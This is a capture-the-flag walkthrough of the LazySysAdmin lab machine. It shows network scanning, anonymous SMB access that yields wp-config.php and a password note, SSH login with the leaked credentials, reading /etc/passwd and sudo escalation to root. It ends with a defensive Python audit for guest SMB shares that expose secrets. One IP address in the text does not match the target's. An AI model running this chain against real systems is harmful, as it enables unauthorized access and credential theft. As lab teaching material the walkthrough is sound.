LazySysAdmin Walkthrough
I personally enjoyed playing with this box; it taught me how to stay focused while doing enumeration and exploitation. There’s so much going on with this box for post-exploitation. Let’s pwn it!
Network Scanning
We always start with network scanning. Let’s find the target IP address by running netdiscover.
┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0
As the netdiscover result shows, our target IP address is 192.168.43.15.
Enumeration/Reconnaissance
Our next step is scanning the target machine. Let’s start with nmap.
┌─[✗]─[root@RDX]─[~]
└──╼#nmap -v -sT 192.168.43.15
With nmap’s TCP connect scan (-sT) we can see the open TCP ports.
We start with ports 139 and 445, which are SMB:
┌─[✗]─[root@RDX]─[~]
└──╼#smbclient -L //192.168.43.15
smbclient lets us list and access the files shared over SMB on the network. Here we are able to log in successfully using anonymous login, and now we can access the ‘share$’ share.
┌─[✗]─[root@RDX]─[~]
└──╼ #smbclient '//192.168.43.15/share$'
smb: \> ls
smb: \> get deets.txt
smb: \> get robots.txt
smb: \> ls
smb: \> cd wordpress\
smb: \wordpress\> ls
smb: \wordpress\> get wp-config.php
┌─[✗]─[root@RDX]─[~]
└──╼ #cat wp-config.php
('DB_USER', 'Admin');
('DB_PASSWORD', 'TogieMYSQL12345^^');
Open http://192.168.43.124/wordpress in the browser.
Now I have my user.
┌─[root@RDX]─[~]
└──╼ #cat deets.txt
CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345
Then check the WordPress user to find the user for the SSH login:
user: togie
passwd: 12345
┌─[root@RDX]─[~]
└──╼ #ssh togie@192.168.43.15
togie@LazySysAdmin:~$ id
togie@LazySysAdmin:~$ cat /etc/passwd
Privilege Escalation
There are two ways to root the machine:
1
togie@LazySysAdmin:~$ sudo -i
[sudo] password for togie:
root@LazySysAdmin:~# id
uid=0(root) gid=0(root) groups=0(root)
2
togie@LazySysAdmin:~$ sudo python -c 'import pty;pty.spawn("/bin/bash")'
[sudo] password for togie:
root@LazySysAdmin:~# id
uid=0(root) gid=0(root) groups=0(root)
root@LazySysAdmin:~# cat proof.txt
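
The whole chain above starts from the anonymous share$ login that exposed deets.txt and wp-config.php. As an added example (not part of the original walkthrough), this Python check parses an smb.conf, finds shares with guest access enabled and lists files under each share path that look like stored credentials. It assumes the share is exported with guest ok = yes; the function names, the file-name and keyword heuristics and the sample configuration are constructed for illustration.

```python
import configparser
import os
import re
import tempfile

# Assumed heuristics: names and content markers that usually mean stored credentials.
SECRET_NAMES = {"wp-config.php", ".env", "id_rsa"}
SECRET_TEXT = re.compile(rb"passw(or)?d", re.I)

def guest_shares(smb_conf_text):
    """Return {share: path} for shares with guest ok (or its synonym public) enabled."""
    text = "\n".join(l.strip() for l in smb_conf_text.splitlines())  # drop indentation
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.read_string(text)
    shares = {}
    for name, sec in cp.items():
        guest = sec.get("guest ok", sec.get("public", "no")).strip().lower()
        if name.lower() != "global" and guest in {"yes", "true", "1"} and "path" in sec:
            shares[name] = sec["path"].strip()
    return shares

def exposed_secrets(root, max_bytes=65536):
    """List files under root whose name or first bytes suggest stored credentials."""
    hits = []
    for folder, _, files in os.walk(root):
        for fname in files:
            full = os.path.join(folder, fname)
            try:
                with open(full, "rb") as fh:
                    head = fh.read(max_bytes)
            except OSError:
                continue  # unreadable file: skip it and keep auditing
            if fname in SECRET_NAMES or SECRET_TEXT.search(head):
                hits.append(os.path.relpath(full, root))
    return sorted(hits)

def audit(smb_conf_text):
    return {s: exposed_secrets(p) for s, p in guest_shares(smb_conf_text).items()}

def demo():  # constructed sample: a web root exported as a guest share
    files = {"deets.txt": "Password PLACEHOLDER\n", "robots.txt": "User-agent: *\n",
             "wordpress/wp-config.php": "define('DB_PASSWORD', 'PLACEHOLDER');\n"}
    with tempfile.TemporaryDirectory() as web:
        for rel, body in files.items():
            os.makedirs(os.path.dirname(os.path.join(web, rel)), exist_ok=True)
            with open(os.path.join(web, rel), "w") as fh:
                fh.write(body)
        conf = f"[share$]\n  path = {web}\n  guest ok = yes\n[private]\n  path = /srv/private\n  guest ok = no\n"
        return audit(conf)
```

On a real server, pass the contents of the Samba configuration to audit(); any non-empty list means credentials are readable without authentication and should be removed from the share and rotated.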